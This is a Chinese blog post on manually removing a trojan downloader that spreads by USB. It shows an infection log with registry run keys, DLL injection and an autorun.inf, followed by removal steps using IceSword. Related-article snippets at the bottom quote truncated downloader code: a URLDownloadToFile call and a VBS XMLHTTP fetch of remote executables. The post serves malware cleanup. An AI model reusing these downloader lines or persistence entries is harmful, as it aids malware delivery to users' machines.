一个比较难杀的木马下载器 kndncso.exe jvxnypf.exe cmdbcs.exe lRAVWL.EXE

最新推荐文章于 2021-05-31 00:01:19 发布
最新推荐文章于 2021-05-31 00:01:19 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: 电脑病毒 文章标签: microsoft c opera dll
本文介绍了一种顽固木马下载器的特点及其清除步骤。该木马通过移动存储介质传播,采用多种手段保护自身,包括守护进程、DLL注入等。清除过程中需使用IceSword等工具按特定顺序操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这是一个比较难杀的木马下载器。可通过移动存贮介质传播。
作者:baohe

来源于:http://forum.ikaka.com/topic.asp?board=28&artid=8310697
一、中毒后的SRENG日志:
(注:中此毒后,SRENG须改名运行。原因见后述。)

启动项目
注册表

[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run]
<naxcehy><C:/windows/system32/kndncso.exe> [N/A]
<gvkfbrq><C:/windows/system32/jvxnypf.exe> [N/A]
<cmdbcs><C:/windows/cmdbcs.exe> [N/A]
<mppds><C:/windows/mppds.exe> [N/A]
<upxdnd><C:/windows/upxdnd.exe> [N/A]
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/ShellExecuteHooks]
<{91B1E846-2BEF-4345-8848-7699C7C9935F}><C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll> [N/A]
==================================
服务
[WinWLServiceNow / WinWLServiceNow][Stopped/Auto Start]
<C:/DOCUME~1/baohelin/LOCALS~1/Temp/RAVWL.EXE><N/A>
==================================
正在运行的进程
[PID: 812][C:/windows/system32/lsass.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[C:/windows/system32/RAVWL516.dll] [N/A, N/A]
[PID: 1816][C:/windows/Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 992][C:/windows/system32/ctfmon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 2148][C:/Program Files/Tiny Firewall Pro/amon.exe] [Computer Associates International, Inc., 6.5.3.2]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 4000][C:/WINDOWS/system32/shadow/ShadowTip.exe] [PowerShadow, 1, 0, 0, 1]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 2164][C:/Program Files/SREng2/SREng.exe] [Smallfrogs Studio, 2.3.13.690]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 2216][C:/Program Files/Opera/Opera.exe] [Opera Software, 8771]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 2904][C:/Program Files/Tiny Firewall Pro/cfgtool.exe] [Computer Associates International, Inc., 6.0.0.52]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 2580][C:/Program Files/Tiny Firewall Pro/tralogan.exe] [Computer Associates International, Inc., 6.0.0.17]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 3112][C:/windows/system32/jvxnypf.exe] [N/A, N/A]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 2392][C:/windows/system32/conime.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 4020][C:/windows/system32/kndncso.exe] [N/A, N/A]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 2740][C:/Autoruns/autorun.exe] [Sysinternals - www.sysinternals.com, 8.43]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 3208][C:/Program Files/HyperSnap-DX 5/HprSnap5.exe] [Hyperionics Technology LLC, 5, 3, 0, 0]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
[PID: 2168][C:/windows/system32/111.exe] [N/A, N/A]
[C:/Program Files/Common Files/Microsoft Shared/MSINFO/SysWFGQQ2.dll] [N/A, N/A]
==================================
Autorun.inf
[D:/]
[AutoRun]
open=gvkfbrq.exe
shellexecute=gvkfbrq.exe
shell/Auto/command=gvkfbrq.exe

二、手工杀毒流程(注意操作顺序):

从上述SRENG日志可见:jvxnypf.exe和kndncso.exe以及它们下载的这堆木马颇难对付。原因在于:
1、jvxnypf.exe和kndncso.exe两个病毒进程相互守护。
2、临时文件夹中的那个C:/DOCUME~1/baohelin/LOCALS~1/Temp/RAVWL.EXE有一个同伙RAVWL516.DLL。此DLL插入了lsass.exe进程。若强制卸除lsass.exe进程中的RAVWL516.DLL,系统会死掉。下次开机时,随着RAVWL.EXE加载,RAVWL516.DLL又插入了lsass.exe进程。
3、病毒模块SysWFGQQ2.dll“不挑食”,见进程就插。
4、当前用户文件夹中还有一堆下载的木马。手工杀毒过程稍有不甚,就会前功尽弃。

鉴于这堆病毒的上述特点,建议用IceSword,按下述操作顺序搞掂他们:

1、改名运行IceSword(因为IceSword已经被病毒通过IFEO劫持了),禁止进程创建。
2、结束病毒进程及被病毒插入的应用程序进程(不要结束lsass.exe进程)。
3、强制删除主要病毒文件(图1-图4)。
4、删除病毒添加的启动项、服务项(见SRENG日志)。
4、取消IceSword的“禁止进程创建”。
5、此时可用资源管理器或WINRAR删除其余的病毒文件(图5)。当然,你也可以用IceSword删除这些病毒文件。我之所以这样做,是出于安全考虑。IceSword删除的文件不能恢复,万一删错,就麻烦了。我的原则是:能不用IceSword删除的,尽量不用IceSword删除。
6、删除病毒添加的IFEO劫持项(可用autoruns查找并删除。注意:autoruns也被病毒IFEO了,需要改名运行。)

图1



打开新窗口浏览

图2



 图3



 

图4



 

图5



点击这儿打开新的窗口

AppInit_DLLs被劫持与解析
testalllife的专栏
03-02 7018
AppInit, DLLs, 解析AppInit_DLLs被劫持及kv*.dll木马群appinit_dlls是什么?appinit_dlls存在路径在windowsNT/cv/windows/APPInit_DLLs ,appinit_dlls是不是病毒呢?注册表的系统设置项“AppInit_DLLs”可以为任一个进程调用一个dll列表早期的进程插入式木马的伎俩,通过修改注册表中的[HKEY_L
逆向病毒nvmini.sys--编译通过-
03-24 2179
/******************************************************************************************** Module : nvmini.c** Author : sudami [sudami@163.com]* Time : 08/02/28** Comment:* 去年月份强悍的“马吉斯(Worm.Magistr
vc++编写一个木马下载器,体积仅有0.3K
尹成的技术博客
03-29 3247
#include #pragma link "w32inet.lib" int main(){HRESULT hRet=URLDownloadToFile(0,"http://www.1111.com/abc.exe","d://abc.exe",0,0); if(hRet==S_OK) {         printf("Download OK!/n");} else {         p
木马下载器Trojan-Downloader.Win32.Small.nkb
04-13 2524
捕获时间2008-04-12病毒症状该程序是使用VC编写的下载程序,由微点主动防御软件自动捕获,采用UPX加壳方式试图躲避特征码扫描,加壳后长度为8,704字节,图标为Windows默认可执行文件图标,病毒扩展名为exe,主要通过网页木马、文件捆绑的方式传播。病毒分析该木马程序被执行后,拷贝自身到%SystemRoot%/system32目录下,修改文件创建时间以及修改时间;通过API函数Crea
国家计算机病毒中心发现"木马下载器"新变种
天津理工大学 王小明(网络管理学生)
03-16 690
木马下载器盗号数十种 破天木马剑指网游
Mitnick_2008的专栏
12-30 1186
木马下载器20480”(Win32.TrojDownloader.wmTable.a.20480),这是一个下载者病毒。此病毒文件为muma.exe的可执行文件,但并不局限于该名称,病毒传播者也可能给它取别的名字。它会从指定的网址下载一份下载列表,下载并执行列表中的数十种盗号木马程序。       “破天木马1851”(Win32.PSWTroj.OnlineGames.nc.18515),该病
穿过网络防火墙监视的木马下载器(转)
cuankuangzhong6373的博客
03-14 541
7月5日:今日提醒用户特别注意以下病毒:“下载器变种jk”(Win32.Troj.Downloader.jk)和“小魔女变种aa”(Win32.Hack.LittleWitch.aa)。   “下载器变种jk”(Win32.Tr...
桌面图标不显示解决方法.pdf
06-10
2. 在任务治理器里终止病毒进程(有可能有 cmdbcs.exe、winform.exe、mppds.exe、wsttrs.exe、msccrt.exe 中的一个或几个,有几个就关几个。注意,现在不要关闭 explorer.exe)。 3. 运行“费尔木马强力清除助手 2.0...
Event ID 26 Source Application Popup
weixin_33913332的博客
09-27 1011
服务器上报Application Popup: Information: 26:Application popup: userinit.exe - DLL Initialization Failed : The application failed to initialize because the window station is shutting down. 信息,该事件的描述表示,操作系统...
超级BT木马下载器 Gameservet.exe的分析 game1.exe 8888-521ww.exe qjso.exe
飘的梦客厅
05-21 5658
  今天接到了一个叫Gameservet.exe的样本 测试了一下 测试结果真的让人震惊 这是个超级变态的木马下载器当今流行的木马几乎都全了 而且最后还捣登出来个威金来 哎 现在的病毒都太厉害 那些无耻的制造病毒者 你们还让人活么?!越来越多的这类案例提示:每个用户应该做好自己系统的防护。不能仅仅指望一两款软保护自己系统的安全。对于病毒,防远重于。by baohe下面就说说测试过程:F
VC无进程木马下载器源码(利用IE隐藏进程)
Koma的主页
08-04 3286
  一、 打开半年前的一个工程,是利用IE来隐藏进程下载的实例,我想灰鸽子也是类似原理吧!       下面是程序的主要思路:       1.获取程序自身路径,启动IE进程       2.获取到IE进程句柄       3.分配内存       4.获取进程映像的地址       5.得到内存镜像大小       6.确定起始基址
vbs下载者和powershell下载器
yiyefangzhou24的专栏
12-25 2385
vbs Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://IP/test.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.T
记一次Emotet木马下载器的分析
jxz_dz的博客
03-29 1727
Part 1: 简要流程: 1. Sub Document_open()执行代码调用O15ho2roxnv7ybuidx.H4b0154n64u 2.1 H4b0154n64u调用 Fl5n0bbcb9wio()返回值: "winmgmts:win32_Process" 2.2 H4b0154n64u 调用 W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae) 2.3 H4b0154n64u 调用 Set Nw0s5mi0i4948 = W7iyi.
小心伪装成jpg图片文件的广告程序/木马下载器
caobihole
07-14 469
endurer 原创2006-07-14 第1版 hxxp://sjzl.****9qian.com/上的图片文件 bb.jpg,会释放文件 setup.exe,采用 ASPack 加壳。 卡巴斯基报为:not-a-virus:AdWare.Win32.WSearch.g 江民KV报为:TrojanDownloader.Adload.hp...
lsass.exe和smss.exe病毒,真厉害!
oldcao的专栏
03-04 923
                                    lsass.exe和smss.exe病毒 真厉害!  最近电脑里多了两个进程,lsass.exe和smss.exe用户名都是administrator怎么删都删除不了,360打不开,优化大师打不开,毒软件打不开,进程管理软件也关不掉这俩进程,这俩病毒进程在C:/program files/system32/com里,
续上篇:比较彻底的清除"代理木马下载器"的方法
weixin_34378767的博客
10-04 280
  今天才发现前天手工清除的"代理木马下载器"病毒不干净。它总是复活,甚至在我重装了N次系统以后,被改成www.4419.com的IE首页还在向我自豪地笑。最后终于发现。病毒原来隐藏在D盘的QQ里。今天花了一个晚上时间研究了一下它做些什么。下面是研究资料和我认为比较彻底的清除方法。 一、监视病毒网页、文件目录和注册表获得的信息 使用工具: filemonNT by Mark Russinovi...
下载木马(QQ尾巴生成器)
@涂涂博客
03-25 3603
链接:https://pan.baidu.com/s/1qs7o9wLKyRyfacTcK27acA 提取码:amcu
【网盘项目日志】20210530:Seafile 病毒扫描系统开发日志
不写博客
05-31 687
备注:本博客编写时,系统本身已经完成,本博客为补档内容。 文章目录书接上回查找资料解决前端问题数据库问题ClamAV 问题调试过程 书接上回 前面咱们搞完了搜索系统,里面涉及到了企业版中的 seafevents。我们知道,seafevents 就是用于处理各种定时任务的,其中就包括了病毒扫描。然后我们还在 seafevents 的包里面发现了病毒扫描的相关代码,那么病毒扫描这个需求应该是比较简单的。 查找资料 在网上查询资料后,我们发现一份针对 ClamAV 开源毒软件的教程: 解决前端问题 这个有了前
H.264流媒体协议格式中的Annex B格式和AVCC格式深度解析
热门推荐
Romantic_Energy的专栏
01-13 3万+
本文需要读者对H.264流有一定的了解才可以理解2种格式差异。          首先要理解的是没有标准的H.264基本流格式。文档中的确包含了一个Annex,特别是描述了一种可能的格式Annex B格式,但是这个并不是一个必须要求的格式。标准文档中指定了视频怎样编码成独立的包,但是这些包是怎样存储和传输的却是开放的。 一. Annex B A.Network Abstractio
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值